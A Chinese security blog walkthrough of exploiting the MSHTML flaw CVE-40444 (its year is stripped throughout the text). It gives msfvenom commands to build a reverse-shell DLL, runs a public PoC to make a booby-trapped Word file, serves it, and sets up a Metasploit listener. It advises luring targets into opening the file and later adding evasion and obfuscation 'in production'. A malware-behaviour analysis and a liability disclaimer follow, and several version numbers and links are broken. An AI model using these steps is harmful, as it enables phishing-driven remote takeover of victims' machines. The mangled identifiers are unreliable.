0x01 漏洞描述
9月8日,微软官方发布了关于MSHTML组件的风险通告(漏洞编号:CVE--40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。
Microsoft 发现,存在尝试通过特别设计的 Microsoft Office 文档利用此漏洞的针对性攻击。攻击者可制作一个由托管浏览器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。然后,攻击者必须诱使用户打开此恶意文件。
0x02 漏洞影响
漏洞编号:CVE--40444
影响版本:Windows Server /R2//R2///等各个主流版本,覆盖面比较广泛,主要用于Office钓鱼。
0x03 测试环境
**攻击机:**kali-linux .1
**靶机:**windows 10(office )
本次漏洞使用lockedbyte师傅的POC,结合kali-linux中metersploit工具
下载地址:
(/lockedbyte/CVE--40444)
0x04 漏洞应用场景
4.1 Kali安装依赖包
sudo apt-get install lcab -y
4.2 生成含有后门的dll
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f dll -o http.dll
下载Poc,进入CVE--40444文件目录下修改exploit.py权限添加写权限,将生成的http.dll程序拷贝到Poc文件夹中并添加写权限。
sudo git clone /lockedbyte/CVE--40444
4.3 利用POC脚本生成含有恶意代码的word文件
sudo python3 exploit.py generate http.dll 本地服务器URL
含有恶意代码的Word文件生成后输出位置在out目录下。
4.4 将含有恶意代码的word文件发送给目标
进入out目录下,启动Python服务器。
python3 -m http.server 80
诱导目标用户点击含有恶意代码的word文件。
4.5 创建监听
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 12.12.12.134 //本地监听IPLHOST => 12.12.12.134msf6 exploit(multi/handler) > set LPORT 4444 //本地监听端口LPORT => 4444msf6 exploit(multi/handler) >exploit
4.6 漏洞触发
文件启动时与服务器获取连接。
目标主机成功上线MSF。
0x05 病毒样本分析
5.1 本地杀软病毒样本检测
5.2 在线病毒样本检测
恶意文件执行流程,文件中创建了MSOSYNC.EXE进程,该进程主要收集操作系统硬件相关的指纹信息
(MachineGuid,DigitalProductId,SystemBiosDate)获取系统信息,包含查询计算机时区的功能。
5.3 样本分析详情
解压样本文件
样本文件中的document.xml.rels中存储了指向的恶意html网站链接,浏览器会自动打开网站链接。
该URL下载一个名为word.html,HTML中的JavaScript包含一个指向CAB文件的对象和一个指向INF文件的iframe. CAB文件已打开,INF文件存储在%TEMP%\Low目录中
由于CAB中存在路径遍历(ZipSlip)漏洞,因此可以将INF存储在%TEMP%中,使用“.cpl:”指令打开INF文件,导致通过rundll32侧面加载INF文件。
攻击者通过伪造cab文件内嵌含有载荷的dll文件,借助漏洞使html文件JavaScript加载含有恶意代码的dll,从而远程执行payload。
文中漏洞利用并未进行免杀处理,如在生产环境下利用时,可结合Office宏病毒等免杀系列技巧进行免杀、混淆,从而获取目标控制权限。
参考链接
/s?id=1715778340261801914
/lockedbyte/CVE--40444
.cn/index.php?m=content&c=index&a=show&catid=57&id=488
/qq_4333/article/details/120463783
/cve--40444-exp/
声明
以上内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。
长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。
如果觉得《利用CVE--40444漏洞钓鱼执法上线MSF》对你有帮助,请点赞、收藏,并留下你的观点哦!
